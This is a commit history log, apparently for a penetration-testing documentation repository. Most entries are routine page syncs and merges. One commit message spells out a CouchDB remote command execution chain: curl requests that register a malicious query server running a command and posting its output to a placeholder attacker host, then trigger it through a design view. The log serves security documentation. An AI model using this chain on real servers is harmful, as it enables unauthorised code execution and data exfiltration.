Commit Graph

1274 Commits

Author SHA1 Message Date
CPol
353938b47c
GitBook: [master] 5 pages and 10 assets modified 2021-05-25 22:52:07 +00:00
Carlos Polop
b4af99059c
Merge pull request #113 from shivankar-madaan/patch-1
remove duplicate line
2021-05-25 23:51:51 +01:00
Carlos Polop
97c49bdb7a
Merge pull request #112 from clem9669/patch-5
Update Pentesting SNMP
2021-05-25 23:51:28 +01:00
Carlos Polop
097da68802
Merge pull request #111 from AssassinUKG/patch-2
Created 1080
2021-05-25 23:46:44 +01:00
CPol
f60b8d7ea8
GitBook: [master] one page modified 2021-05-24 15:55:07 +00:00
Jeffrey Bencteux
e505cc2b55
Command execution via query_servers fix
Hey man, I got a working example, I think the issue is that you are requesting your view with POST rather than PUT method. Following works for me:

curl -X PUT 'http://<target_ip>:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"id | curl http://<attacker_ip>:<port> -d @-"'
curl -X PUT 'http://<target_ip>:5984/testbed'
curl -X PUT 'http://<target_ip>:5984/testbed/whatever' -d '{"_id":"770855a97726d5666d70a22173005c77"}'
curl -X PUT http://<target_ip>:5984/testbed/_design/whatever -d '{"_id":"_design/test","views":{"anything":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"
2021-05-24 10:43:15 +02:00
Vince
92096e6cd1 Add missing hyphen
The "enumeration from a pod" command example to get all services is missing a hyphen.
2021-05-23 23:24:28 +02:00
Vince
44e0145e11
Link to English kubectl install documentation
The Kubernetes "enumeration from a pod" documentation links to Spanish instructions to install kubectl. This commit changes the URL to the English documentation.
2021-05-23 21:11:01 +00:00
CPol
3876d7fb90
GitBook: [master] one page modified 2021-05-21 17:16:33 +00:00
CPol
757acc677c
GitBook: [master] 36 pages modified 2021-05-21 17:13:19 +00:00
CPol
2f22c14f27
GitBook: [master] 3 pages modified 2021-05-21 17:12:21 +00:00
CPol
6c9a0f3975
GitBook: [master] 7 pages modified 2021-05-21 16:38:18 +00:00
CPol
23948173f0
GitBook: [master] 3 pages modified 2021-05-21 11:41:36 +00:00
CPol
fc77b585a9
GitBook: [master] one page modified 2021-05-20 22:43:37 +00:00
CPol
319542ab0f
GitBook: [master] 3 pages modified 2021-05-20 15:02:14 +00:00
CPol
e15860f1d3
GitBook: [master] 467 pages and 2 assets modified 2021-05-20 12:17:20 +00:00
shivankar-madaan
60360dd0c7
remove duplicate line
just shhgit was mentioned twice
2021-05-20 10:38:12 +02:00
CPol
d2d0b1333e
GitBook: [master] one page and 7 assets modified 2021-05-19 23:28:34 +00:00
CPol
7b6767a4f8
GitBook: [master] 3 pages modified 2021-05-19 16:11:33 +00:00
clem9669
430a952347
Update Pentesting SNMP
Adding an extra command to gather information about users
2021-05-19 12:49:04 +00:00
CPol
89c55b14cd
GitBook: [master] 463 pages modified 2021-05-18 23:29:06 +00:00
CPol
11e285456e
GitBook: [master] one page and 2 assets modified 2021-05-18 23:15:50 +00:00
CPol
d4daa0a69c
GitBook: [master] 3 pages modified 2021-05-18 12:34:46 +00:00
CPol
71e52daa5d
GitBook: [master] one page modified 2021-05-18 08:18:19 +00:00
CPol
1e0f49f6e8
GitBook: [master] one page modified 2021-05-18 08:12:15 +00:00
CPol
0bf986c68a
GitBook: [master] one page and 5 assets modified 2021-05-17 22:56:23 +00:00
CPol
3926f377c2
GitBook: [master] 4 pages modified 2021-05-17 19:08:47 +00:00
CPol
17cd871714
GitBook: [master] one page modified 2021-05-17 16:11:05 +00:00
CPol
47ac5534af
GitBook: [master] 2 pages and 16 assets modified 2021-05-16 18:23:48 +00:00
CPol
2c779ca982
GitBook: [master] one page modified 2021-05-16 14:24:45 +00:00
CPol
9ccaaf1f6c
GitBook: [master] one page modified 2021-05-15 23:21:47 +00:00
CPol
36c20843d1
GitBook: [master] 461 pages modified 2021-05-15 12:48:28 +00:00
CPol
32b68b5fe9
GitBook: [master] 3 pages and one asset modified 2021-05-15 09:00:32 +00:00
CPol
c46409a533
GitBook: [master] one page modified 2021-05-14 22:26:05 +00:00
CPol
3c87a2d5d8
GitBook: [master] 2 pages modified 2021-05-14 22:25:03 +00:00
CPol
91e791577e
GitBook: [master] 6 pages and 4 assets modified 2021-05-14 19:31:19 +00:00
CPol
8d827274d9
GitBook: [master] 461 pages and 2 assets modified 2021-05-14 18:57:48 +00:00
AssassinUKG
e6d2dc62a5
Updated some errors
updated file name to lowercase, added in output
2021-05-14 01:14:06 +01:00
AssassinUKG
52883e4161
Created 1080
I tried to keep to your format and style for the document. very sorry if this is not fully correct. Thank you again for all of your hardwork!
2021-05-14 01:08:24 +01:00
CPol
75163b0688
GitBook: [master] one page modified 2021-05-13 23:02:05 +00:00
CPol
7b518497b6
GitBook: [master] 5 pages modified 2021-05-13 22:59:50 +00:00
Carlos Polop
95b16dc7eb
Merge pull request #110 from AssassinUKG/patch-1
Update to add in SOCKS brute force
2021-05-13 22:40:06 +02:00
CPol
211f259ea2
GitBook: [master] one page modified 2021-05-13 19:37:24 +00:00
CPol
92b3947a84
GitBook: [master] 456 pages modified 2021-05-13 19:13:08 +00:00
CPol
fed0f5f23b
GitBook: [master] 3 pages modified 2021-05-13 18:33:03 +00:00
CPol
996ae7f540
GitBook: [master] one page modified 2021-05-13 18:06:06 +00:00
CPol
19ef41e986
GitBook: [master] 2 pages modified 2021-05-13 17:53:07 +00:00
AssassinUKG
94c72ce02e
Update to add in SOCKS brute force
Update to add in SOCKS brute force
2021-05-13 17:02:48 +01:00
CPol
a14bc076b8
GitBook: [master] 456 pages modified 2021-05-13 10:15:06 +00:00
CPol
8a1cf44ae5
GitBook: [master] one page modified 2021-05-12 23:41:15 +00:00